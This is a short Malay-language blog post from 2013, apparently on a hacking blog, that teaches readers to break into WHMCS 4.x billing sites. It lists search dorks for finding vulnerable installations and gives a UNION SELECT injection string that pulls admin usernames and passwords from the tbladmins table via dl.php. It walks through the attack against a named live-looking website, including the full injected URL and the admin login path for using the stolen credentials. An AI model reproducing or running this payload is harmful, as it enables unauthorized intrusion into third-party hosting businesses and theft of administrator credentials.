Wednesday, 5 June 2013

Hack WHMCS Dengan SQL Injection


Assalamualaikum dan salam sejahtera.Entry hari ni aku nak ajar korang cara nak hack WHMCS dengan SQLi. Vulnerable ni terdapat pada WHMCS 4.x .

WHMCS? WHMCS ni adalah WHMCompleteSolution dimana selalunya webapps ni digunakan untuk laman jual beli seperti laman web hosting dan domain.
Ok jom!

1. Mula-mula cari website vuln dengan dork :

- intext:"Powered by WHMCompleteSolution"


- inurl:"submitticket.php‎"‎

inurl:dl.php?type=

2. Lepas dah dapat satu website masa untuk inject.Contoh aku dapat laman web ni :

http://www.powermailings.com/billing/dl.php?type=d&id=1

String untuk kita inject :

and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --


Sekarang tambah string tu di hujung nombor id url website tu.contoh :

http://www.powermailings.com/billing/dl.php?type=d&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --

Lepas tu Enter!
Bila kita inject ni, kalau berjaya browser kita akan download satu file format .pdf .dalam file ni adalah Username dan Password WHMCS tu :D

3. Untuk login :
http://www.target.com/path/admin


contoh :
http://www.powermailings.com/billing/admin
Ok itu saja untuk tutorial kali ni.enjoy...


Item Reviewed: Hack WHMCS Dengan SQL Injection Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com